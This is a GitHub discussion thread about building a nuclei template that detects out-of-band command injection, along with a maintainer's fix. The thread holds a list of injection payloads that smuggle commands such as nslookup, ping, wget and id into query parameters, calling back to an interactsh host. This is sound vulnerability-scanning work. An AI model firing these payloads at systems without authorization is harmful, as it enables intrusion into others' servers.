Need Help Creating an OOB Command Injection Template

[Nishantbhagat57]

Hello ProjectDiscovery team, I am currently working on an OOB Command Injection Template.

I have been using the https://github.com/projectdiscovery/fuzzing-templates/blob/main/cmdi/blind-oast-polyglots.yaml template as a reference and have created my own OOB Command Injection Template:

id: oob-cmd-injection 

info:
  name: Out-of-Band Command Injection
  author: Nishantbhagat57
  severity: high
  description: Detects potential Out-of-Band Command Injection vulnerabilities.
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
  tags: cmdi, oast, dast, oob

variables:
  marker: "{{interactsh-url}}"

http:
  - method: GET
    path: 
      - "{{BaseURL}}"

    payloads:
      inject: payloads/command-injection-payloads.txt
      
    fuzzing:
      - part: query
        type: replace
        mode: multiple
        fuzz:
          - "{{inject}}"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: interactsh_protocol
        words:
          - "http"

The payload file command-injection-payloads.txt contains payloads like this:

;&nslookup {{marker}}&
;&/usr/bin/id;{{marker}}&
;& ping -i 30 {{marker}} &
;& id & {{marker}}
;& id; {{marker}}
;%0a id %0a {{marker}}
;nslookup {{marker}}||
|nslookup {{marker}}||
`nslookup {{marker}}`||
(nslookup {{marker}})||
;ping -c 1 {{marker}}||
|ping -c 1 {{marker}}||
`ping -c 1 {{marker}}`||
(ping -c 1 {{marker}})||
;wget {{marker}} -O /dev/null||
|wget {{marker}} -O /dev/null||
`wget {{marker}} -O /dev/null`||
(wget {{marker}} -O /dev/null) ||

However, I am having trouble validating if the template works as expected.

First the issue is that I think it needs to wait for atleast 5 seconds to detect dns or http interaction, and I can't find any reference regarding sleeping or delaying the next request for a specific period of time. The template doesn't really wait for the interaction, it should wait for atleast 1 seconds.

Additionally, I tried validating the template by:

1. Setting the concurrency level to -c 1 when using nuclei command
2. I used a big payload list so I had the time to copy the interactsh url. Used burp collaborator url like -u "https://xyzde8cm4raqzo8zns504raiy8mx.oastify.com/app?param1=FUZZ&param2=FUZZ2&param3=FUZZ3"
3. When the template was running on a single url, that means each request will be made with same interactsh url {{marker}}
4. I quickly copied the interactsh url using Burp Collaborator Logs, then used the curl command on the terminal: curl "interactsh url"
5. As per the template, if any DNS or HTTP intercation is made on the interactsh url then the URL is vulnerable. I used the above steps 2-3 times, however nuclei reports "No results found. Better luck next time"

I am unsure how to validate if the template is working correctly and would appreciate your assistance in refining this template.
@princechaddha @ehsandeep

Thank you,
Nishant

[Nishantbhagat57]

ping @princechaddha @ehsandeep

[ehsandeep]

@Nishantbhagat57 you can use constants instead of variables as there seems to be an issue with using variables in combiation of payloads + fuzz and we are looking into it.

- variables:
+ constants:
  marker: "{{interactsh-url}}"

[Nishantbhagat57]

@Nishantbhagat57 you can use constants instead of variables as there seems to be an issue with using variables in combiation of payloads + fuzz and we are looking into it.

- variables:
+ constants:
  marker: "{{interactsh-url}}"

Thanks, this worked perfectly :)